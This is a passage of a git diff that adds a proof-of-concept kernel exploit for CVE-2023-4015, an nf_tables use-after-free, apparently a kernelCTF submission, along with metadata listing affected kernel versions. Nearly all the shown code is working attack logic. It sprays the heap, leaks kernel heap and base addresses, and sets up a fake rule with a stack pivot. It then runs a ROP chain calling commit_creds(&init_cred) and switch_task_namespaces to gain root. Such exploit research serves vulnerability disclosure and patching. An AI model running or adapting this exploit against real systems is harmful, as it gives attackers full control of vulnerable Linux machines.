NFT_NOTRACK_OPS; + } + INFO("vmlinux = 0x%lx", vmlinux); + + return MNL_CB_OK; +} + +static int dump_exprs(const struct nlmsghdr *nlh, void *data) { + rule r; + + r = nftnl_rule_alloc(); + nftnl_rule_nlmsg_parse(nlh, r); + + nftnl_expr_foreach(r, data, NULL); + + nftnl_rule_free(r); + + return MNL_CB_OK; +} + +static int leak_heap() { + INFO("Trying to leak kernel heap"); + + char data[191 - sizeof(struct nft_expr) - sizeof(struct nft_rule)] = {0}; // to make the rule fall in kmalloc-192 + expr e = make_notrack_expr(); // for leaking vmlinux later + rule r = make_rule(current_table_name, "spray", &e, 1, data, sizeof(data), 0); + + for (int z = 0; z < SPRAY_BATCHES; ++z) { + batch b = batch_init(1048576); // 1M buffer should be enough + for (int i = 0; i < SPRAY_BATCH_SIZE; ++i) { + batch_new_rule(b, r); + } + batch_end(b); + if (batch_send(b, nlsock) == -1) { + ERROR("batch_send"); + return -1; + } + batch_free(b); + if (run_callbacks(nlsock, NULL, NULL) < 0) { + ERROR("run_callbacks"); + return -1; + } + } + + char buf[MNL_SOCKET_BUFFER_SIZE]; + rule r_primitive = make_rule(current_table_name, "primitive", NULL, 0, NULL, 0, 4); // the primitive rule has handle = 4 + rseq = seq; + nlmsghdr hdr = dump_rule(r_primitive, buf); + if (mnl_socket_sendto(nlsock, buf, hdr->nlmsg_len) < 0) { + ERROR("mnl_socket_sendto"); + return -1; + } + if (run_callbacks(nlsock, dump_exprs, dump_expr_leak_heap) < 0) { + ERROR("run_callbacks"); + return -1; + } + + return 0; +} + +static int leak_vmlinux() { + INFO("Trying to leak kernel base"); + static int table_spray_counter = 0; + + char data[128] = {0}; + struct nft_chain *fake_chain = (struct nft_chain *)data; + // set rule list and chain flag for later stage + // because we trigger RIP control by deleting the primitive rule, + // the immediate expression deactivation will only call deactivate() + // on the rules under this chain if chain flags has NFT_CHAIN_BINDING. 
+ fake_chain->rules.next = fake_chain->rules.prev = (struct list_head *)heap; + fake_chain->flags = NFT_CHAIN_BINDING; + // exprs are flattened after rule metadata, then comes userdata + // we prepared a notrack expr before, now let's leak its ops + fake_chain->name = (char *)(heap + sizeof(struct nft_rule)); + + for (int z = 0; z < SPRAY_BATCHES; ++z) { + batch b = batch_init(1048576); // 1M buffer should be enough + for (int i = 0; i < SPRAY_BATCH_SIZE; ++i) { + char table_name[32]; + sprintf(table_name, "tskb%d", table_spray_counter++); + table t = make_table(table_name, data, sizeof(data)); + batch_new_table(b, t); + nftnl_table_free(t); + } + batch_end(b); + if (batch_send(b, nlsock) == -1) { + ERROR("batch_send"); + return -1; + } + batch_free(b); + if (run_callbacks(nlsock, NULL, NULL) < 0) { + ERROR("run_callbacks"); + return -1; + } + } + + char buf[MNL_SOCKET_BUFFER_SIZE]; + rule r_primitive = make_rule(current_table_name, "primitive", NULL, 0, NULL, 0, 4); // the primitive rule has handle = 4 + rseq = seq; + nlmsghdr hdr = dump_rule(r_primitive, buf); + if (mnl_socket_sendto(nlsock, buf, hdr->nlmsg_len) < 0) { + ERROR("mnl_socket_sendto"); + return -1; + } + if (run_callbacks(nlsock, dump_exprs, dump_expr_leak_vmlinux) < 0) { + ERROR("run_callbacks"); + return -1; + } + + return 0; +} + +static int spray_krop() { + INFO("Spraying KROP"); + static int table_spray_counter = 0; + + rule r_to_delete = make_rule(current_table_name, "spray", NULL, 0, NULL, 0, rule_handle); + + batch b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2); + batch_del_rule(b, r_to_delete); + batch_end(b); + if (batch_send(b, nlsock) == -1) { + ERROR("batch_send"); + return -1; + } + batch_free(b); + if (run_callbacks(nlsock, NULL, NULL) < 0) { + ERROR("run_callbacks"); + return -1; + } + + INFO("Sleeping to wait for the work queue to actually free the rule"); + sleep(1); + + save_state(); + + char data[192] = {0}; + struct nft_rule *fake_rule = (struct nft_rule *)data; + fake_rule->dlen = 
1; // pass the check + struct nft_expr *fake_expr = (struct nft_expr *)(data + sizeof(struct nft_rule)); + fake_expr->ops = (struct nft_expr_ops *)(heap + 0x88 - 0x28); // offset 0x88 of fake rule <=> expr->ops->deactivate (offset 0x28 of expr->ops) + // the jop gadget jumps to [rsi + 0xf] so we put the stack pivot gadget there + *(uint64_t *)((char *)fake_expr + 0xf) = vmlinux + POP_RSP_R13_R14_R15_RET; + + uint64_t *rop = (uint64_t *)(data + sizeof(struct nft_rule) + sizeof(struct nft_expr)); + + // pass through the stack pivot gadget + rop++; + rop++; + + // commit_creds(&init_cred) + *rop++ = vmlinux + POP_RDI_RET; + *rop++ = vmlinux + INIT_CRED; + *rop++ = vmlinux + COMMIT_CREDS; + + // switch_task_namespaces(find_task_by_vpid(getpid()), &init_nsproxy) + *rop++ = vmlinux + POP_RDI_RET; + *rop++ = getpid(); + *rop++ = vmlinux + FIND_TASK_BY_VPID; + *rop++ = vmlinux + MOV_RDI_RAX_CMP_RDI_RDX_JNE_XOR_EAX_EAX_RET; + *rop++ = vmlinux + POP_RSI_RET; + *rop++ = vmlinux + INIT_NSPROXY; + *rop++ = vmlinux + SWITCH_TASK_NAMESPACES; + + // return to userspace + *rop++ = vmlinux + KPTI_TRAMPOLINE; + *rop++ = vmlinux + PUSH_RSI_JMP_QWORD_PTR_RSI_F; // jop gadget, put here because this space is unused + rop++; + *rop++ = (uint64_t)monke; + *rop++ = user_cs; + *rop++ = user_rflags; + *rop++ = user_sp; + *rop++ = user_ss; + + for (int z = 0; z < SPRAY_BATCHES; ++z) { + batch b = batch_init(1048576); // 1M buffer should be enough + + for (int i = 0; i < SPRAY_BATCH_SIZE; ++i) { + char table_name[32]; + sprintf(table_name, "tsrp%d", table_spray_counter++); + table t = make_table(table_name, data, sizeof(data)); + batch_new_table(b, t); + nftnl_table_free(t); + } + + batch_end(b); + if (batch_send(b, nlsock) == -1) { + ERROR("batch_send"); + return -1; + } + batch_free(b); + if (run_callbacks(nlsock, NULL, NULL) < 0) { + ERROR("run_callbacks"); + return -1; + } + } + + return 0; +} + +static void escalate() { + INFO("Escalating privileges"); + + // deleting the primitive rule 
will call deactivate on the bound chain + // because we set the flag of the reclaimed fake chain to `NFT_CHAIN_BINDING`, + // all expressions under all rules of that chain will have its deactivate() routine. + rule r = make_rule(current_table_name, "primitive", NULL, 0, NULL, 0, 4); // the primitive rule has handle = 4 + batch b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2); + batch_del_rule(b, r); + batch_end(b); + if (batch_send(b, nlsock) == -1) { + ERROR("batch_send"); + return; + } + batch_free(b); +} + +int main() { + if (setup() == -1) + return -1; + + memset(free_chain_name, 'A', sizeof(free_chain_name) - 1); + free_chain_name[sizeof(free_chain_name) - 1] = '\0'; + + while (heap < 0xffff000000000000) { + if (trigger_uaf() == -1) + return -1; + + if (leak_heap() == -1) + return -1; + } + + while (vmlinux < 0xffffffff00000000) { + if (leak_vmlinux() == -1) + return -1; + } + + if (spray_krop() == -1) + return -1; + + escalate(); +} diff --git a/pocs/linux/kernelctf/CVE-2023-4015_cos/metadata.json b/pocs/linux/kernelctf/CVE-2023-4015_cos/metadata.json new file mode 100644 index 00000000..57f29f70 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4015_cos/metadata.json @@ -0,0 +1,38 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": [ + "exp96" + ], + "vulnerability": { + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0a771f7b266b02d262900c75f1e175c7fe76fec2", + "cve": "CVE-2023-4015", + "affected_versions": [ + "5.10.188 - 5.10.189", + "5.15.119 - 5.15.123", + "6.1.36 - 6.1.42", + "6.3.10 - 6.3.13", + "6.4 - 6.4.7", + "6.5-rc1 - 6.5-rc3" + ], + "requirements": { + "attack_surface": [ + "userns" + ], + "capabilities": [ + "CAP_NET_ADMIN" + ], + "kernel_config": [ + "CONFIG_NF_TABLES" + ] + } + }, + "exploits": { + "cos-105-17412.156.23": { + "uses": [ + "userns" + ], + "requires_separate_kaslr_leak": false, + "stability_notes": "Near 100%" + } + } +} \ 
No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2023-4015_cos/original.tar.gz b/pocs/linux/kernelctf/CVE-2023-4015_cos/original.tar.gz new file mode 100644 index 00000000..a2658d84 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-4015_cos/original.tar.gz differ